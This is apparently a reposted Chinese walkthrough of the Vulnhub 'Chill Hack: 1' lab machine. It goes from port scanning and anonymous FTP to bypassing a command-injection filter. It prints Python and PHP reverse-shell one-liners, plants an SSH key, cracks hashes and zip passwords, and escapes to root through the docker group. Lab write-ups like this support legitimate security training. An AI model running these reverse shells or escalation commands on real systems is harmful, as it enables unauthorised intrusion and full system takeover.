Vulnhub-Chill-Hack-1

admin 2023年10月8日13:57:39评论28 views字数 3495阅读11分39秒阅读模式
免责声明
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!

0x01 靶机介绍

    • Name: Chill Hack: 1

    • Date release: 9 Dec 2020

    • Author: Anurodh Acharya

    • Series: Chill Hack

    • Description: Find flags(user and root)

    • Difficulty: Easy

靶机下载地址:

https://www.vulnhub.com/entry/chill-hack-1,622/

0x02 侦察

口探测
首先使用 nmap 进行端口扫描
nmap -p- -sV -sC -A 192.168.0.103 -oA nmap_chill-hack


Vulnhub-Chill-Hack-1

扫描结果显示目标开放了21、22和80端口
80端口
访问http://192.168.0.103为 GameInfo 官网

Vulnhub-Chill-Hack-1

目录扫描
使用 gobuster 进行目录扫描,成功发现目录/secret
gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirb/big.txt -x php

Vulnhub-Chill-Hack-1

访问http://192.168.0.103/secret可执行命令

Vulnhub-Chill-Hack-1

0x03 上线【WWW-data】

FTP匿名登录

通过匿名登录漏洞成功进入 FTP 服务

ftpftp > open 192.168.0.103## 输入账号anynomousftp > lsftp > get note.txt

Vulnhub-Chill-Hack-1

查看notes.txt,提示显示命令执行存在字符过滤

cat note.txt

Vulnhub-Chill-Hack-1

命令执行

输入whoami执行命令,命令执行成功


Vulnhub-Chill-Hack-1

但一旦输入敏感字符就会被拦截

Vulnhub-Chill-Hack-1

执行which 'nc'命令发现目标存在 nc,但是通过mac 'nc'命令发现不存在-e和-c参数

Python反弹shell

在本地监听5555 端口

nc -nvlp 5555

输入以下命令通过 Python 执行反弹shell

'python3' -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.0.106",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

Vulnhub-Chill-Hack-1

成功拿到反弹shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

Vulnhub-Chill-Hack-1

PHP反弹shell

在本地监听6666 端口

nc -nvlp 6666

利用管道符进行绕过

whoami|php -r '$sock=fsockopen("192.168.0.106",6666);exec("/bin/bash -i <&3 >&3 2>&3");'

功拿到反弹shell

Vulnhub-Chill-Hack-1

0x04 权限提升【apaar】

在/var/www/files中找到文件hacker.php,同时存在敏感图片路径images/hacker-with-laptop_23-2147985341.jpg

Vulnhub-Chill-Hack-1

在该目录下还有文件index.php,内容如下

Vulnhub-Chill-Hack-1

成功找到 MySQL 数据库的连接账号密码

dbname: webportalhost: localhostusername: rootpassword: !@m+her00+@db

sudo提权

查看当前用户 sudo 权限,在以 apaar 用户身份执行/home/apaar/.helpline.sh脚本时无需密码

sudo -l

Vulnhub-Chill-Hack-1

通过 sudo 以 apaar 用户身份执行该脚本,成功提权为 apaar 用户

sudo -u apaar /home/apaar/.helpline.sh> myself> bashbash > id

Vulnhub-Chill-Hack-1

在当前用户家目录下成功拿到第一个flag

python3 -c 'import pty;pty.spawn("/bin/bash")'cd ~cat local.txt

Vulnhub-Chill-Hack-1

0x05 权限提升【ROOT】

SSH私钥登录

在本地中生成 SSH 密钥

ssh-keygen

Vulnhub-Chill-Hack-1

把生成的公钥内容复制到目标靶机的authoried_key中

Vulnhub-Chill-Hack-1

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqd/pE+JzFvsEsubvx04yM8eeEkypqIh09J6+QiwXHjViL/lh3Y+mRSQOuaFRVdogHlidFhU4mPQf+NfgkcHKceh+zB+poXx9Mev/9YqmPgMuviaJYpvOxo+72aJOrKLxghZycx5OiyaiIgbYzcj1D595uFy2W8r0hgRCmH0cfDLXCqWtfQwX6wc4+ztL2oWUSOLHyKJMABBVxIhDqbM2ZmKw7mxjzKM6WtoZ66yMk23TxAotV4+eI2Vb/XqUksDb4ptLO0hsTpomIifp5Drfv8UKWnRrIfWDcvbP/KUypjUb3yLx0FdbNNedNm5SJj0EyNb1VI4IMU2Au3IinOUVOWjsyFOS35kllSdWTfuLj/RqBixM3hfpsx2jnCEYYk05iahaJpEGbVz8PRGsStNiYG/DE5JT5ddYvONjDAEZ1VuAfT5wIpGWrPS3Yoe6Hj+FVQd9CfsJirPPehXopKxZO3iw43qyDeYZ8V9qhenNdoJdENDm6QohC/Fcv9tRVvc= root@kali' >> ~/.ssh/authorized_keys

Vulnhub-Chill-Hack-1

通过 SSH 成功免密登录

ssh apaar@192.168.0.103

Vulnhub-Chill-Hack-1

如果出现以下情况,可直接使用命令清除记录

ssh-keygen -f "/root/.ssh/known_hosts" -R "192.168.0.103"

Vulnhub-Chill-Hack-1

MySQL登录
登录数据库成功发现 users 表,其中存在用户名和密码
mysql -uroot -p -Dwebportal##输入密码!@m+her00+@db

Vulnhub-Chill-Hack-1

| 1 | Anurodh   | Acharya  | Aurick    | 7e53614ced3640d5de23f111806cc4fd || 2 | Apaar     | Dahal    | cullapaar | 686216240e5af30df0501e53c789a649 |

在解密网站上对密码进行破解,成功解密为明文 网站地址:

https://crackstation.net/

Vulnhub-Chill-Hack-1

7e53614ced3640d5de23f111806cc4fd: masterpassword686216240e5af30df0501e53c789a649: dontaskdonttell

信息收集
通过 scp 传递图片文件

scp apaar@192.168.0.103:/var/www/files/images/hacker-with-laptop_23-2147985341.jpg .


使用 steghide 配合空密码提取数据,成功拿到 zip 压缩包,但解压需要密码

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

利用 fcrackzip 进行密码爆破,成功拿到密码pass1word

fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt  backup.zip

Vulnhub-Chill-Hack-1

解压后源码如下,在其中发现经编码后的密码

unzip back.zipcat source_code.php

Vulnhub-Chill-Hack-1

通过 Base64 解码拿到密码为!d0ntKn0wmYp@ssw0rd

echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d

Vulnhub-Chill-Hack-1

查看全部用户,可登录用户只有apaar、anurodh、aurick

cat /etc/passwd | grep -v nologin

Vulnhub-Chill-Hack-1

通过aunrodh/!d0ntKn0wmYp@ssw0rd成功登录目标 SSH,该用户属于 docker 组

ssh anurodh@192.168.0.103id

Vulnhub-Chill-Hack-1


docker提权
推荐网站:
https://gtfobins.github.io/

Vulnhub-Chill-Hack-1

寻找 docker 提权命令并成功提权

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

在管理员用户家目录下成功找到第二个flag

python3 -c 'import pty;pty.spawn("/bin/bash")'cd ~cat proof.txt

Vulnhub-Chill-Hack-1

0x06 知识星球

Vulnhub-Chill-Hack-1

原文始发于微信公众号(狐狸说安全):Vulnhub-Chill-Hack-1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月8日13:57:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-Chill-Hack-1https://cn-sec.com/archives/2092316.html

发表评论

匿名网友 填写信息